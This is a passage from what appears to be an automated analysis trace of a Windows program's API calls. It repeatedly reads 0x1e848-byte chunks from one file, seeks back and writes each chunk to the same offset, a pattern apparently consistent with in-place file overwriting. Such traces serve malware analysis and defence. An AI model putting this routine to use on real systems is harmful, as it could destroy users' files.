lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.084] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7cee6c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.084] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.086] GetProcessHeap () returned 0x500000 [0123.086] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.086] GetProcessHeap () returned 0x500000 [0123.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.086] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7d2b750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.086] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.098] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7d2b750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.098] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.099] GetProcessHeap () returned 0x500000 [0123.099] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.099] GetProcessHeap () returned 0x500000 [0123.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.099] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7d687e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.099] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.146] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7d687e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.146] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.147] GetProcessHeap () returned 0x500000 [0123.147] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.147] GetProcessHeap () returned 0x500000 [0123.147] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.147] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7da5870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.147] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.182] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7da5870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.182] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.183] GetProcessHeap () returned 0x500000 [0123.183] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.183] GetProcessHeap () returned 0x500000 [0123.183] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.183] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7de2900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.183] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.281] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7de2900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.282] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.283] GetProcessHeap () returned 0x500000 [0123.283] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.284] GetProcessHeap () returned 0x500000 [0123.284] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.284] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7e1f990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.284] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.295] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7e1f990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.296] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.296] GetProcessHeap () returned 0x500000 [0123.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.296] GetProcessHeap () returned 0x500000 [0123.297] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.297] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7e5ca20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.297] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.310] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7e5ca20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.310] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.311] GetProcessHeap () returned 0x500000 [0123.311] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.311] GetProcessHeap () returned 0x500000 [0123.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.311] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7e99ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.311] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.321] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7e99ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.321] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.325] GetProcessHeap () returned 0x500000 [0123.326] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.326] GetProcessHeap () returned 0x500000 [0123.326] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.326] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7ed6b40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.326] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.337] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7ed6b40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.338] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.338] GetProcessHeap () returned 0x500000 [0123.338] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.338] GetProcessHeap () returned 0x500000 [0123.339] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.339] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7f13bd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.339] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.364] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7f13bd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.364] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.365] GetProcessHeap () returned 0x500000 [0123.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.365] GetProcessHeap () returned 0x500000 [0123.365] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.365] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7f50c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.365] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.379] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7f50c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.379] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.379] GetProcessHeap () returned 0x500000 [0123.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.380] GetProcessHeap () returned 0x500000 [0123.380] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.380] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7f8dcf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.380] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.391] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7f8dcf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.391] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.392] GetProcessHeap () returned 0x500000 [0123.392] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.392] GetProcessHeap () returned 0x500000 [0123.392] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.393] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7fcad80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.394] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.408] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7fcad80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.408] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.409] GetProcessHeap () returned 0x500000 [0123.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.409] GetProcessHeap () returned 0x500000 [0123.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.409] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8007e10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.409] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.428] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8007e10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.428] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.428] GetProcessHeap () returned 0x500000 [0123.428] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.428] GetProcessHeap () returned 0x500000 [0123.428] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.428] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8044ea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.429] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.439] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8044ea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.439] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.440] GetProcessHeap () returned 0x500000 [0123.440] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.440] GetProcessHeap () returned 0x500000 [0123.440] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.440] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8081f30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.440] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.454] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8081f30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.454] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.455] GetProcessHeap () returned 0x500000 [0123.455] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.455] GetProcessHeap () returned 0x500000 [0123.455] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.455] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80befc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.455] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.466] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80befc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.466] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.467] GetProcessHeap () returned 0x500000 [0123.467] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.467] GetProcessHeap () returned 0x500000 [0123.467] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.467] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80fc050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.467] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.487] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80fc050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.487] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.488] GetProcessHeap () returned 0x500000 [0123.489] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.489] GetProcessHeap () returned 0x500000 [0123.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.489] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81390e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.489] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.506] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81390e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.506] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.511] GetProcessHeap () returned 0x500000 [0123.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.511] GetProcessHeap () returned 0x500000 [0123.511] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.511] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8176170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.511] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.528] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8176170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.528] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.529] GetProcessHeap () returned 0x500000 [0123.529] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.529] GetProcessHeap () returned 0x500000 [0123.529] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.529] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81b3200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.529] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.547] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81b3200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.547] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.548] GetProcessHeap () returned 0x500000 [0123.548] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.548] GetProcessHeap () returned 0x500000 [0123.548] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.548] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81f0290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.548] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.568] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x81f0290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.568] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.569] GetProcessHeap () returned 0x500000 [0123.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.570] GetProcessHeap () returned 0x500000 [0123.570] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.570] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x822d320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.570] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0123.581] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x822d320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.581] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0123.582] GetProcessHeap () returned 0x500000 [0123.582] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0123.582] GetProcessHeap () returned 0x500000 [0123.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0123.582] SetFilePointerEx (in: hFile=0x220, 